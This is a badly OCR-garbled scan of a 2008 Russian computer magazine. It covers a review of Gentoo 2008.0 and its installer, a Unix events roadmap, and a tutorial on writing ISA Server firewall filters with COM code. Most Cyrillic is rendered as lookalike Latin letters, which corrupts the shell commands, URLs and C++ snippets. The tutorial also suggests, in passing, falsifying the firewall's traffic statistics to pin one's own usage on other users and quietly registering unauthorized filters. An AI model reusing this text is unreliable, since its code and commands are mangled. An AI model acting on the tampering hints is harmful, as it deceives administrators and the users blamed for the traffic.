[ іоггепіз.депіоо.огд ]. 




КРазметка диска втекстовом варианте СепЬо Іпзіаиег 
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Система профилей — набор настроекдля определенной 
архитектуры или некоторого класса задач — сделала 
Сепіооудобным инструментом для создания других 
дистрибутивов. Профили находятся в /изг/рогСаде/ 
ргоПіІез, где уже есть заготовки для систем с повышен- 
ными требованиями к безопасности (багбепеб и зеИпих), 
встраиваемыхустройств (етЬеббеб), десктопов и серве- 
ров. Списание текущего профиля доступно по команде: 

# саС /еСс/таке . рго:Еі1е/рагепЦ 

. . /кагдеСз/сіезкЦор 

Как видишь, профиль по умолчанию десктоп ный. Чтобы 
изменить его, достаточно создать симлинк /екс/таке . 
ргоПіІе на каталоге выбранным профилем в /изг/ 
рогкаде/ргобііез. 

Н НОВИНКИ 2008.0 

Финальная версия Сепіоо Еіпих 2008.0 под кодовым 
названием «И’здоІѵѵЬаІрІапІзсгаѵе» вышла сопозда- 
нием на 4 месяца (релиз был намечен на середину марта) 
и спустя 14 месяцев после предыдущего релиза 2007.0. 
Версия 2007.1 из-за большой загруженности разработ- 
чиков не состоялась. Но для таких дистрибутиве в, как 
Сепіоо, само понятие «релиз» весьма относительно, ведь 
в любой момент можно обновиться до актуального состоя- 
ния. Тем более, сами разработчики регулярно поставляют 
обновленные срезы. Релизы выходят именно тогда, когда 
они должны появиться, и накоплена критическая масса 
обновлений. Поэтому назвать недостатком «невыход в 
срок» тяжело. Например, в другом подобном дистрибутиве 
АгсЬ Еіпих ( ѵѵѵѵѵѵ.агсЫіпих.огд ) выход релизов вообще не 
принято планировать. 



Вероятно, именно по этой причине список нововведений 
на странице ѵѵѵѵѵѵ. депЬо.огд/п еѵѵ5/20080706- геіеазе- 
2008. 0.хппі насчитывает всего шесть основных пунктов. 

По сравнению стой же Мапбгіѵа, выглядит он скупо, но, по 
крайней мере, свидетельствует о том, что разработчики не 
успели ничего испортить. Переход на ядро 2.6.24 означает 
расширение списка поддерживаемого оборудования. 

Чтобы уменьшить размер образа, место 6М0МЕ на ЕіѵеСВ 
занял ХЕсе 4.4.2, который и будет установлен в качестве ра- 
бочего окружения при бинарной инсталляции. Теперь КОЕ 
(кстати, есть и четвертый) или ОМОНЕ необходимо собирать 
из исходников. Полностью реструктурированы профи- 
ли; новое их размещение — подкаталог беІаиЕ/Ііпих. И, 
конечно, обновление коснулось основных пакетов: Рогіаде 
2.1 .4.4, дсс 4.1.2, дІіЬс 2.6.1 и других в дереве еЬиіШ. 

ОепФо 2008.0, кроме стандартных х86- и атб64-архи- 
тектур, также доступен для: Аірба, НРРА, ІА64, МІР5, РРС, 
5390,5Ни5РАРС64. 

Не обошлось и без багов. Сразу после релиза всплыли 
две серьезные ошибки, не позволяющие записать образ 
для атб64 на обычную СП-болванку, а загрузка в ЕіѵеСП 
часто прерывалась из-за ошибки записи кегпеі/іпіігатіз 
в 1:ппр15. Проявлялось это не всегда и не во всех конфи- 
гурациях, но сейчас это уже не важно, так как выпущена 
исправленная версия 2008. 0-г1 . Будь внимателен при 
закачке. 

На странице для загрузки дистрибутива ( ѵѵѵѵѵѵ.депіоо. 
огд/таіп/еп/уѵЬеге.хтІ ) из всего списка вариантов приме- 
нительно кх86 и а тб 64 на выбор предложены всего два. 
Вариант Міпіт а [ СП/ІпзІаиСП размером 80 Мб содержит 
только базовый набор и ориентирован на сетевую уста- 
новку. Выбрав вариант ЕіѵеСП, можно в итоге получить 
рабочую систему, собранную из пакетов. Здесьуже досту- 
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пен графический вариант инсталлятора. В настоящее время ЫѵеОѴВ 
вариант для х86 и атс164 из-за проблем со сборкой не предлагается, 
но, возможно, он будет доступен позднее. 

Для тех, кто уже имеетустановленный бепіоо, перед обновлением 
советую ознакомиться с руководством бепіоо Врдгасііпд биібе, которое 
размещено по адресѵ ѵѵѵѵѵѵ.депіоо.огд/сіос/еп/депіоо-ирдгабіпд.хппі. 
Собственно, большая часть описанных проблем связана с изменения- 
ми в профиле. 

Кстати, роадмап на этот год весьма жесткий, поэтому в ближайшее 
время можно ожидать версию 2008.1 . 

Н УСТАН0ВЩИК6ЕМТ00 

Один из НоѵѵМоіТо «Как НЕ устанавливать бепіоо Ыпих» на сайте 
еЬазЬ.іп/Ьоѵѵпоио гласит: «...не пользуйтесь графическим инсталлято- 
ром! На данный момент (2007.0) он хоть и не такой кривой, как раньше, 
но все еще не готов заслужить всеобщего одобрения, а тех, кто им вос- 
пользуется, ждут страшный суд, вечные муки, ад и погибель». Привел 
полностью, чтобы было понятнее, какустановщик выглядел прежде. 

В бепіоо 2008.0 обновленная (до версии 0.6.6] программа инсталляции 
дистрибутива на жесткий дисктеперь поддерживаеттолько локаль- 
ную, бессетевую установку при помощи пакетов и дерева еЬиіШ’ов. 

В новинках числятся и многочисленные исправления для работы с 
дисковыми разделами. Доступны два варианта интерфейса бепіоо 
Іпзіаиег — ОТК+ и псевдографический. По рядок установки в каждом 
случае несколько отличается, а отдельные моменты до сих пор вводят 
в ступор даже матерых линуксоидов. Скажем, на некоторых этапах 
надо выбирать между «ОК» и «5аѵе апб Сопбпие». Ну, и что нажимать? 
Вернуться к предыдущему шагу в текстовом варианте нельзя: нужно 



Творческие 

порывы 

создателя СепШо 

Летом 2005 года Дэниел Роббинс (кстати, бывший разработчик 
РгееВЗВ) удивил все сообщество своим переходом в компанию 
Місгозобг, где возглавил лабораторию по исследованию открытых 
систем (Місгозобг Ьіппх апсі Ореп Зопгсе ЬаЬ) . Впрочем, проработал 
он там меньше года, в качестве официальной причины ухода была 
указана невозможность полной реализации своих способностей. 

К «родному» проекту он вернулся в марте 2007 года. 



сохранить настройки, завершить установку, закрыв терминал, и начать 
все сначала. В графическом вернуться назад можно, нотолько теоре- 
тически :). Переход со второго шага (точки монтирования) на первый 
(разметка диска) и обратно может отправить установщик в нокаут, а на 
третьем и четвертом шаге кнопка «Ргеѵіоиз» заблокирована. 
Реализована автоматическая разметка диска, которая активиру- 
ется выбором РесоттепсІесІ ЕауоиЕ При ее использовании будет 
создан 1 00- мега байтный раздел /Ьооі и свап, равный двойному 
ОЗУ (до 51 2 Мб), а остальное отдано под корень (форматируется 
в ехіЗІз). Кстати, именно так рекомендовано разбивать диск в 
официальном руководстве. Беда втом, что мастер не подозревает 
о наличиидругихОС и сотрет все разделы, уточнив, на всякий 
случай, насчеттвоей уверенности в дальнейших действиях. Не 
нравится? Тогда только вручную. Тем более, это несложно. 

Сам Іпзіаиег весьма прост в обращении и обеспечивает не только 
установку, но и первичную настройку того, что раньше приходилось 
вбивать ручками прямо в конфигурационные файлы, покуривая мануа- 
лы. Кое-какие подсказки даются в левом окне мастера. 

Если вкратце, то процесс выглядит так: разметка диска; на- 
стройка точек монтирования; после нажатия на Мехі без всякого 
предупреждения начнется распаковка установочных файлов на 
диск, прерывать которую не стоит. Далее вводим пароль гооС 
задаем часовой пояс. На этапе настройки сети можно указать па- 
раметры не только ЕіЬегпеІ: -устройств, но и ѴѴіЕі. Теперь заводим 
нового пользователя, подглядывая в левую панель при запол- 
нении названий групп. Затем программа предлагает выбрать 
отдельные пакеты для установки в группе ехіга, которые разбиты 
на несколько категорий : XII, НесоттепсІесІ, Зегѵегз, М ізс и 
□ евкіор. Пакетов в каждой категории немного. После выбора 
будет произведена проверка зависимостей. Например, я указал 



ХЕсе, но не отметил, что мне нужен Х.Огд. Установщик справился 



Дистрибутивы 
на базе СепШо 

Стоит отметить, Сепгоо дал жизнь нескольким дистрибутивам 
— ЗаЬауоп, Саісиіаге Ьіпих Везкшр, спасательному ЗузгешКезсиеСВ 
и некоторым другим. Наиболее популярен из них ЗаЬауоп (\ѵѵш. 
заЬауопИгшх.ог^) — он является, наверное, самым дружественным 
на сегодня Сепгоо. Хотя бывалые гентушники считают его, скорее, 
иллюстрацией возможностей Сепшо, чем реальным соперником. 
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ипіхоіс 



> ІП^О 

• Минимальные 
системные требова- 
ния: процессор 486 
и выше, 64 Мб ОЗУ, 
раздел 1 .5 Гб + 256 
Мб под свап. Но для 
работы в бепіоо же- 
лательно иметь более 
современный комп 
(особенно при само- 
стоятельной сборке 
приложений). 



• В качестве названия 
дистрибутива выбран 
самый быстрый из 
пингвинов Рудозсеііз 
рариа, по-английски 
депіоо. 



• Дистрибутив 
ЗаЬауоп, о кото- 
ром шла речь в 
Х_06_2008, основан 
на бепіоо и имеет 
удобный графичес- 
кий инсталлятор. 

• Утилита Оеііир 
( беІШр.зГпеІ: ) поз- 
воляет сэкономить 
львиную долю трафи- 
ка при обновлении. 

• Эксперимен- 
ты над сборками 
6СС показали, что 
производительность 
получаемого пакета 
увеличивалась (в 
зависимости отаппа- 
ратного обеспечения) 
от 10 до 200% по срав- 
нению с бинарными 
сборками дсс, пос- 
тавляемыми другими 
дистрибутивами. 

• Па кет V і ГІ; и а [/ зу з Іо д 
показываетзави- 
симость от любого 
пакета, отвечающего 
за журналирование. 



с задачей, но никаких предупреждений не вывел, и до 
окончания процесса я буду оставаться в неведении, 
заработаетли система. 

Далее отмечаем сервисы, которые будут стартовать 
при загрузке, и в отдельном окне устанавливаем ряд 
параметров (консольный шрифт, менеджер входа, рас- 
кладка, оконный менеджер и прочее). Все, инсталляция 
завершена. 

Заметим, о загрузчике нас никто не спрашивал. Но 
через некоторое время узнаем, что Оепіоо грузится и 
даже почти что работает (почти — так какХ и остальное 
настраиваются по-прежнему ручками). В моем случае 
после команды зіагіх стартанул ТѴѴМ, хотя при настройке 
я выбирал ЭВМ и ХРсе :). 

В НЕМНОГО О РАБОТЕ 

Меню загрузки в ЫѵеСО-варианте очень простое. Нажав 
<П >, можно получить информацию по доступным ядрам, 
а <Р2> открывает доступ к информации о дополнительных 
параметрах. В процессе загрузки скрипт на несколько 
секунд остановится, позволяя ввести другую раскладку 
клавиатуры. Если был нажат <Еп1:ег> или ответа не пос- 
ледовало, через некоторое время загрузка продолжится 
с параметрами поумолчанию. В окне регистрации можно 
выбрать русский язык, но, ксожалению, на ХРсе это никак 
не скажется. Если есть работающий ОНСР, сеть будет 
настроена автоматически. 

Установить пакет элементарно. Находим нужное назва- 
ние, введя команду вроде «етегде --зеагсіт арасЬе» 
или (для поиска в описаниях) «етегде --зеагсЬйезс 
арасЬе», и устанавливаем: 

# етегде арасііе 



По умолчанию апач идет с таки ми параметрами: 

ІІЗЕ="1(іар ЗЗІ -сіеЬид -сіос -трт-еѵепС \ 
-трт-іСк -трт-регизег -трт-ргеРогк \ 
-трт-ѵ^огкег -по-зиехес (-зеііпих) \ 
-зкакіс-тосіиіез -Щтгеасіз" 

Знак минуса показывает, что с этим флагом пакет компи- 
лироваться не будет. Чтобы узнать, с какими флагами будет 
установлен пакет, следует добавить параметры ' -азк ' , 
'-аѵ' или ' -рѵ '. Чтобы собрать программу с другими 
флагами, используй конструкцию вроде: 

# иЗЕ="-1(іар тот сіос" етегде араске 

Увы, при следующем обновлении пакет будет собран 
со стандартным набором флагов. Чтобы упростить себе 
жизнь, флаги для отдельных пакетов лучше заносить в 
файл /екс/рогкаде/раскаде . изе . Удалить пакет 
также просто: «етегде — иптегде название» и его как 
не бывало. Облегчить работу с флагами по может утилита 
еизе. Вводим «еизе — і название_флага» и выясняем, 
взведен ли он. 

В ЗАГЛЯНУТЬ ПОД КАПОТ 

Сравнивать Оепіоо с другими дистрибутивами нив коем 
случае нельзя. 

Это выбортех, кто любиттотальную оптимизацию и привык 
все держать под полным контролем. Тем, кому нужен 
просто дистрибутив, готовый к работе сразу после уста- 
новки, без желания и необходимости заглянуть под капот, 
покопаться в моторе, — лучше смотреть в сторону ОЬипІи, 
Мапбгіѵа и прочих решений. ^ 
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АНДРЕЙ МАТВЕЕВ 
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*піхгоасІтар 

Чтобы ТЫ не потерялся в череде новых релизов и конференций, мы подгото- 
вили для тебя настоящий гоабтар всех значимых событий в мире "піх. 
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□ ЕВІАМ5.0 
ІЕММУ 




6ЕМТ00 

2008.1 




ымихріимвЕРЗ 
СОМРЕРЕМСЕ, 
ПОРТЛЕНД, 
ОРЕГОН, США 
17СЕНТЯБРЯ 




ОМСААЕ 



ОМОНЕ 

2.24.0 

24СЕНТЯБРЯ 




ХРСЕ4.6 

28СЕНТЯБРЯ 




аІ*/Й 

ІІП1ІХ 



ивимти8.10 Аітымих4.і 

МА5ТЕР 




РЕООРАЮ 



АЯСКЯХш 



МАМОРІѴА 


МУСВ5ОСОМ 2008, 


Е0Р0В50С0М 


ЫМиХ2009 


КОЛУМБИЙСКИЙ 


2008, СТРАС- 




УНИВЕРСИТЕТ, 


БУРГСКИЙ 




НЬЮ-ЙОРК, США 


УНИВЕРСИТЕТ, 




11-120КТЯБРЯ 


СТРАСБУРГ, 

ФРАНЦИЯ 

18-190КТЯБРЯ 



ыпді;РкхЛРкАі;рк 








1 






0РЕМВ504.4 


НОВАЯ 




15В4.0 


0РЕМ505Е11.1 


1 НОЯБРЯ 


РЕАЛИЗАЦИЯ 
СЕТЕВОЙ ПОДСИСТЕМЫ 
ДЛЯ РРЕЕВ5О8.0 




11 НОЯБРЯ 


18ДЕКАБРЯ 
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НИКОЛАЙ БАЙБОРОДИН 

/ ВА1В0Н001Ы@СМА1Ь.С0М / 




ТЮНИНГОВАННАЯ 



ПИШЕМ СВОЙ ФИЛЬТР ДЛЯ МЕЖСЕТЕВОГО ЭКРАНА 

І5А Зегѵег — серьезный компонент обеспечения информадионной безопас- 
Ёости. Сегодня я покажу тебе, как приручить этого монстра и заставить его' 
Исполнять твои желания. Не Оудем распускать слюни и поминать всуе велй^ 
Ёий и ужасный МІСГ050Г1:. Просто возьмем в руки І5А 5РК и реализуем самые^ 
казалось бы, бредовые идеи. 



слитебе приходилось работать с І5А Зегѵег (даже непродолжи- 
тельное время), то, наверняка, утебясложилосьдвойственное 
впечатление об этом программном продукте. С одной стороны 
— это мощная система обеспечения сетевой безопасности и контроля за 
использованием сетевых ресурсов. Но в нем не хватает многих вкусностей, 
которыеделаютжизньсисадмина шоколадной. Самый красноречивый 
пример — автоматическоеуправление квотами интернет-трафика. Считать- 
то трафик І5А считает, но вот выставить пользователю квоту и перекрыть ему 
кислород в случае превышения — мы уже не могем. И приходится вручную 
просматривать статистику и ручками отключать нерадивых юзверей от все- 
мирной паутины. Аадмин, какизвестно, существо крайне ленивое итакой 
раскладего, конечно, неустраивает. 

Нагугливэтутему,ты получишьдесятки ссылокна различные надстройки к 
Исе. Всеони раздаются незадаром, а за вполне осязаемыеамериканские 
рубли. Ноеслиутебя прямые руки, да еще и растут, откуда надо, то, взяв на- 



пильники рубанок(в смысле, ІЗАЗОКи М50М), ты сможешь подогнать Ису 
подсвои потребности, незаплатив ни рубля софтверным барыгам. Ауж что 
утебя за потребности — сам определяй, не маленький. Можешь запретить 
своим подопечным юзверям убивать рабочее время в социальных сетях 
и сэкономить своему работодателю бабла, подняв производительность 
офисного планктона на 50%. Можешь хакнуть статистику Исы, повесив свой 
трафик на других пользователей. В конце концов, перспектива порулить 
файрволом на уровне программных интерфейсов и в обход штатной админ- 
ки —заманчивая, не так л и? 

Из инструментовтебе понадобятся ѴізиаІЗіисііо, сам подопечный файрвол 

и І5А5егѵег50К. 

В 15А-ФИЛЬТРЫ — БЫСТРЫЙ СТАРТ 

Для начала давай заглянем Исе под капот и посмотрим, кактаму нее все 
устроено. І5А Зегѵег имеет двухуровневую архитектуру — Кегпеі Мобе и 
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изег Мосіе. Ядро сервера отвечаетза взаимодействие с сетевыми ин- 
терфейсами компьютера и выполняеттранспортные функции, работая с 
низкоуровневыми сетевыми протоколами. Фильтрация сетевого трафика 
осуществляется на пользовательском уровне — все пакеты проходят 
через цепочку фильтров. Каждый фильтр — это отдельная ОІІ’ка, выпол- 
няющая функции СОМ-сервера. Фильтры бывают, в свою очередь, двух 
типов — анализирующиесетевойтрафики реагирующие на определен- 
ные события. Так как невозможно объять необъятное, остановимся на 
фильтрах для Исы первого типа. Уже реализованные фильтры, которые 
входят в состав файрвола, соответствуют практически всем сетевым 
протоколам прикладного уровня (РТР, 5МТР, 0М5, РОРЗ, РРС ит.д.). Ты 
можешь переопределить их, заменив собственной реализацией, напри- 
мер, открыть зеленый коридор спам-трафику. К этой же группе относятся 
фильтры приложений (пригодятся, если нужно обломать доступ в Сеть 
определенным прогам) и фильтры сетевых портов (обламываютторрент- 
сосунов]. 

Атеперь — мат. часть. Расслабься, ее будет совсем немного. Наша цель 
— вкурить, каким образом в Исе работаютфильтры. Любой фильтр есть не 
что иное, как носитель сетевых правил. Правила, в свою очередь, бывают 
двух типов — правила доступа и правила публикации сервисов. Другими 
словами, фильтрующие входящий трафик и исходящий. 

Один сетевой фильтр может объединять в себе несколько правил фильтра- 
циитрафика, относящихся кразным группам. 

Идем дальше. Все фильтры могут отрабатывать различные сценарии 
проверки сетевых пакетов, основанные на отслеживании используемых 
протоколов, МАТ-сеансов и фильтрации контента. 

Все 15А-фильтры выстраиваются в цепочку. В результате, проходящая через 
файрвол информация будет обработана каждым фильтром из цепочки. 
Организовать избирательную обработку пакетов какими-либо отдельными 
фильтрами не получится. Зато есть возможность выстроить несколько таких 
цепочек с уникальным набором фильтров, и в различных сценариях пропус- 
кать трафикчерез цепочку, определеннуюлогикой сетевой защиты. 



В ФИЛЬТРУЙ БАЗАР 

В момент старта Исы ее основная служба пробегает по списку за- 
регистрированных фильтров и для каждого из них вызывает метод 
іРѴ^ХРіІСег : : РіІСегіпіс. Он является точкой входа в фильтр, и 
метод инициализирует доступные из файрвола глобальные перемен- 
ные фильтра. Их основное назначение — зарезервировать за фильтром 
определенные сетевые события, при возникновении которых ядро 
сервера будет передавать фильтру управление. 

// Инициализация сетевого фильтра 
ЗТВМЕТНОВІМР СВМРІІРег: :РІ1ЦегІпіВ 
( ІРѴ\[ХРіге\л?а11 * рІРШХРігеѵ^аІІ , 

Рѵ^хРіІРегНоокЕѵепРз * рЕіІСегНоокЕѵепРз ) 

{ 

// Сообщаем файрволу, какое именно событие 
будем отслеживать 

*рЕіІРегНоокЕѵепРз = т_Еѵ^хЕіІРегНоокЕѵепРз ; 
гебигп 3_ОК; 

} 

Послетого, какфильтр проинициализирован,за работу принимается 
обработчиксобытий іРѴ^ХРіІкег : : АккасІіТоЗеззіоп —сообщаете 
каждой новой сессии, установленной клиентами с Исой. Для сессии соеди- 
нения клиента с сервером фильтр создает объект, реализующий интерфейс 
іРѴ^ХЗеззіопРіІкег , и передает файрволу ссылку на него. 

// Подключаемся к сессии 

ЗТВМЕТНОВІМР СВМРіІРег: : АРРасПТоЗеззіоп 
(ІРШХЗеззіоп *ріЗеззіоп, 

ІРШХЗеззіопРіІРег ** 

ріЗеззіопРіІбег , РРѵ\?хРіІРегНоокЕѵепРз , 
рРИкегНоокЕчепбз ) 



Веб-фильтры 

Веб-фильтры представляют собой особую разновидность расши- 
рений І5А Зегѵег. Реагируя на различные события, возникающие 
в модуле ѴѴеЬ ргоху, веб-фрільтры могут анализировать НТТР-за- 
головки, принимая на основе такого анализа одно из возможных 
решений. 

Все веб-фильтры реализованы в виде динамических библиотек, 
инициализируемых в момент старта службы Міегозобг Рігеѵѵаіі и 
остающихся в памяти до завершения работы службы. 



Точки входа 

Любой разрабатываемый тобой веб-фильтр для І5А Зегѵег должен 
иметь, как минимум, одну точку входа. В качестве таковой всегда 
выступает пара определенных функций. Для І5А Зегѵег 2004 это — 
функцииОекѴ^РХРіІкегѴегзіоп ( ) и НккрѴ^РХРіІкегРгос ( ) . 
Для 2006-ой могут быть использованы как указанные выше 
функции (сделано для того, чтобы сохранить совместимость с 
фильтрами, написанными для предьщущей версии файрвола), так 
и оптимизированные под возможности І5А Зегѵег 2006 функции 
ОекРіІкегѴегзіоп ( ) и НккрРіІкегРгос ( ) . 
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> Ііпкз 

• Залежи документа- 
ции по ІЗАЗегѵег на 
М50М: 

ПП5СІП.ППІСГ050ІІ:. 

сот/еп-из/ІіЬга гу/ 
аа1 55227.агрх 

• Русскоязычное со- 
общество ІЗАЗегѵег 
— ѵѵѵѵѵѵ.ізазегѵег.ги 

• Здесь можно ска- 
чать свежую версию 
как самого файрвола, 
так и ЗОК к нему: 
до.тісгозоі'І.сопп/ 
Г\л/[1пк?[1пк1б^41251 



• Кое-что о файрво- 
лах можно найти и в 
народной энциклопе- 
дии — \л/\л/ѵѵ■ѵѵікіресIіа■ 
огдЛігеѵѵаи 



Файрвол — 
жертва Во8-атак 

При создании своего расширения для файрвола (не 
важно, І5А Зегѵег или любого другого, поддерживаю- 
щего написание расширений сторонними разработ- 
чиками), важно помнить о том, что системная память 
не резиновая и устанавливать ограничения, как по 
размеру обрабатываемых сетевых пакетов, так и по 
времени, отведенному на обслуживание одной сессии. 
Иначе можно попасть в очень неприятную ситуацию, 
когда файрвол, не сумев переварить слишком большую 
порцию данных, станет причиной краха всей системы. 



НКЕЗиЬТ І1Г = 3_ОК; 

//Создаем объект, связанный с сессией 
ССотОЬ^ есЦ<СВМЗеззіопРі1бег> 
*рЗеззіопРіІЦег ; 

Ът = ССотОЬз' есЦ<СВМЗеззіопРі1бег> : : 
Сгеабеіпзбапсе (&рЗеззіопРіІЦег) ; 
іб (РАІРРВ(Ііг) ) 

{ 

геВигп йг; 

} 

рЗеззіопРіІРег->АбсіКеб ( ) ; 

// Получаем ссылки на созданные объекты 
*рРіІРегНоокРѵепДз = 

т_Рѵ^хРіІРегНоокЕѵепбз ; 
*ріЗеззіопРіІРег = рЗеззіопРіІбег ; 




Ц)хитеДДа' ІЗАЗегѵе] 



вдогонку — содержимое І/О буфера. О дальнейшем позаботит- 
ся файрвол, точнее, его ядро. 

Естественно, чтобы просто получить данные и передать ихдаль- 
ше по Сети, много ума не надо. Да и какой тогда смысл городить 
весь этот огород? Вотт^-то (между получением пакетов и их 
отправкой) и кроется Дао любого ІЗА-фильтра. Именно в этом 
месте канала передачи данныхчерез ІЗАЗегѵегможнотворитьс 
сетевыми пакетами все, что угодно. Что в итоге получит клиент на 
свой запрос, — целиком и полностью в твоей власти. 

Не ста ну марать попусту бумагу описанием сферического коня 
в вакууме, — воттебе конкретный пример. Предположим, 
наш фильтр должен передавать пакеты — без каких-либо 
изменений, но при этом подробножурналировать: кто, что, 
кому, и зачем. Первым делом получаем ссылки на сокеты 
отправителя и получателя с помощью простых конструкций 
типат_зрІпкегпа13оскек = ріІпкегпаІЗоскек и 
т_зрЕхкегпа13оскек = ріЕхкегпаІЗоскек. Теперь 
можно создаватьасинхронный канал передачи данных. 
Делается это с помощью метода, возвращающего в качестве 
результата своей работы объект класса зтеметноеіМ: 
СЕМВакаЕіІкег : : СотрІекеАзупсІО ( ) . После чего 
можно прочитать входной буфер: 



гекигп 3_ОК; 

} 




> ІП^О 

Помни, что неты один 
такой умный и регу- 
лярно проводи аудит 
своего файрвола на 
предмет незнакомых 
и неизвестно откуда 
появившихся филь- 
тров и расширений. 



Через этот объект в дальнейшем файрвол и будет общаться с 
фильтром, посылая сигналы только о тех событиях, которые 
его интересуют. Получив сигнал отом, что в Сети происхо- 
дит нечто интересное, фильтр создаетэкземпляр класса 
іЕѴ^ХЕакаЕіІкег и ассоциируетего стекущим соединени- 
ем через вызов ІЕѴ\[ХСоппескіоп : : АккаскВакаЕНкег. 
В качестве финального аккорда создадим два сокета 
(іЕѴ^ХЕакаЕіІкег : : ЗекЗоскекз) и прокачаем данные 
източки Авточку В, какучила меня сексапильная матема- 
тичка в седьмом классе (упс, Анна Сергеевна, надеюсь вы 
не читаете журнал «][акер»). Но об этом ниже. 



В ИЗ ТОЧКИ А В ТОЧКУ В 

в любом 15А-фильтре используется асинхронный ввод/ 
вывод. Фильтр управляет за проса ми 5ЕМВ/ВЕСѴ через 
обращения к объекту іЕѴ^ХЗоскек, который размещается в 
адресном пространстве ядра файрвола и возвращает содер- 
жимое І/О-буферов через интерфейс іЕѴ^ХіОСотрІекіоп. 
Получается, процесс передачи сетевых пакетов через 
фильтр прост, какдва байта об асфальт. Берем указатель на 
іЕѴ^ХЗоскек и отправляем ему ВЕСѴ-запрос. В ответ получа- 
ем содержимое буфера. Шаманим надним немного, например, 
проанализировав на предметналичия запрещенного типа 
данных, отправляем объекту іЕѴ^ХЗоскек запрос 5ЕМВ и в 



ВУТЕ* рВиккег = ШРР; 

ВШКВ бѵ7ВиккЗІ2е = 0; 

І 1 Г = рІ0Виккег->Се1:ВиккегАпбЗІ2е 
(&рВиккег , &бѵ^ВиккЗІ 2 е) ; 

Отправка полученных данных — ничуть не сложнее. Обраща- 
емся ксозданному ранее сокету и сливаем в него содержимое 
І/О-буфера. 

НКЕЗиЬТ кг; 

ССотРкг<1РШХЗоскек> зрЗоскек; 
СекІпкегпаІЗоскек (&зрЗоскек ) ; 
ік (зрЗоскек) 

{ 

кг = зрЗоскек->Зепсі(рВиккег ,ыиРР, 
осШгікеТоІпкегпаІ ) ; 
ік (РАІРЕВ(кг)) 
гекигп кг; 

} 

гекигп 3_ОК; 

Перед этим мы можем сделать вызов любой другой 
функции, обрабатывающей содержимое буфера. На- 
пример, каск (рВиккег ) . Реализация самой функции 
и определяет поведение фильтра. В частности, если ты 
хочешь вести подробный лог о передаваемых пакетах, 
можешь воспользоваться представленным в 5ВК методом 
ЕитрВиккег ( ) . 
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ЮГГѴГАКЕ 

М ІСН050ГТ I ІГГЕНІІЕТ ІЕСиНГЛТ ЛНІР 
ШІШШМІІШ5ЕІНѴЕ11 2ПМ 



^ІІЫІИІ 



І'И'^#ЪйгІМ 



I 



^ I 



|І5А5егѵег5РЦ 



г ЗАРЕГИСТРИРУЮ. НЕДОРОГО. 

ОК, свой фильтр для Исы мы написали. Акакеготеперьфайрволу под- 
сунуть? Естьдва пути — написать простенький скрипт, осуществляющий 
регистрацию фильтра, или предусмотреть механизм регистрации непос- 
редственно в самом фильтре. Во втором случае регистрация происходит 
с помощью экспорта функции ВІІіпзСаІІ, вызываемой в момент обраще- 
ния кгедзгѵ32 с параметром /і. 

Строго говоря, чтобы зарегистрировать свой фильтр в Исе, необходимо 
одновременное выполнение следующихусловий. Во-первых, ВЕЕтвоего 
фильтра должна находиться на том же компьютере, что и І5А5егѵег. Во- 
вторых, фильтр должен бытьзарегистрирован какобъект конфигурации 
компьютера. И, в-третьих, он должен бытьзарегистрирован какУЖЕ уста- 
новленный на компьютер. 

Независимо оттого, какой способ регистрации ты будешь использовать, 
технически она основана на использовании четырех экспортируемых СОМ- 
интерфейсов: 

I» ІРѴѴХРіИегАНтІп] - регистрация фильтра; 

I* * РРСЕѵепШеЛпІіопЗ — регистрация событий, отслеживаемых фильтром; 
к РРСАІегіаІ - регистрация сообщений, генерируемыхфильтром; 

• РРСАррІісаІіопРіІІег — инициализация значениями поумолчанию. 

Чтобы сообщить ядру файрвола, за какими протоколами будет на- 
блюдать свежеиспеченный фильтр, используется массив: оиів 
РгоСосоІзТоРіІСег [] = { ЗМТР_РКОТОСОЬ_ОиіВ_ВІЫ, ЗМТР_ 
ЗЕКѴЕК_РКОТОСОЬ_Сілв_віМ} . Для описания фильтра используется 
структура со следующими полями: 

|«СЕ5ІР_РМРШё|| -биіР: 

!• ЬзІгРіИегМатіІ — наименование; 

I* ЬзІгРіИегРезсгіріІоІІ — описание; 

!• ЬзІгРіИегѴепсІоіІ — разработчик; 

I* Ь5ІгРіИегѴег5ІоіІ — версия. 

Развеем все возможные вопросы. Воттебеописаниетого, как регистрация 
фильтра или любого другого расширения для І5А5егѵег выглядит на прак- 
тике. Первым делом создается экземпляр СОМ-объекта РРСѴ^еЬРіІСег, 
входящий в коллекцию РРСѴ^еЬРіІСегз. Для идентификации каждого из 
таких объектов в коллекции используется глобальный уникальный иден- 
тификатор (61Л0). Коллекция объектов РРШеЬРИСегз предоставляет 
отдельные методы для выполнения следующих операций: 

• добавление нового веб-фильтра (метод Асій); 

• изменение порядка следования веб-фильтров в коллекции (методы 
МоѵеВоѵлэ и МоѵеИр); 

• удаление веб-фильтра из коллекции (метод Ветоѵе). 

И напоследок — финтушами в виде ответа на вопрос, который, скорее всего, 
ужедавно засел втвоей голове. Можноли зарегистрировать фильтр или 
другое расширение Исы вручную? Отвечаю — можно. И меня совершенно 
не интересует, зачем тебе это нужно :). 




ІпІете15есип1у& 
Ассеіегаііоп 5егѵег2о0б 



Епсетрля Ыіѵ'ол 



|І5А5егѵёІ| 

Наша задача сводится ктому, чтобы поместитьзаписьо новом фильтре 
в конфигурационный массив Исы. Кактыужезнаешь, сточки зрения 
внутренней организации файрвола, это будет выглядеть какдобавление 
нового ЕРСѴ^еЬЕіІСег объекта в коллекцию ЕРСѴ^еЬЕіІСегз. Следо- 
вательно, нужно как-то добраться до этой самой коллекции. Порывшись в 
документации, я выяснил, какэто можно реализовать. Следи за цепочкой. 
Конфигурационный массив сервера доступен для изменения извне. В 
массиве содержится ссылка на объект класса ЕРСЕхСепзіопз.Уэтого 
объекта есть несколько публичных полей. Сдно изтаких полей имеет 
название Ѵ^еЬЕіІСегз, и, как нетрудно догадаться, представляет собой 
ссылку на коллекцию РРШеЬРИСегз. Науровнеоперационной системы 
эта коллекция представлена какобычная ветка реестра. Сзначаетэто, что, 
добавив буквальнотри строки в код нашего расширения для І5А5егѵег, мы 
сможем вручную его зарегистрировать (тривиальным способом с помощью 
гедзгѵ32). Для этого добавляем кнашему фильтру небольшую функцию 
следующего вида: 

ЗТВАРІ ВІІКедізСегЗегѵег ( ѵоісі) { 

НКЕЗВВТ І 1 Г = ЕедізВегІДеЬРіІЦег ( Сгие) ; 
геСигп РАІВЕВ(Ііг) ? 3_ЕАЕЗЕ : 3_ОК; 

} 

Теперьты можешь подключитьсвой фильтр к работающей на полном ходу Исе 
без ка ких-либо вопросов с ее стороны. Адальше— уже делотвоей фантазии. 

Н ЛИРИЧЕСКО-СПОРТИВНОЕ 

Обычно на этом месте авторы по всем правилам жанра подводят итог 
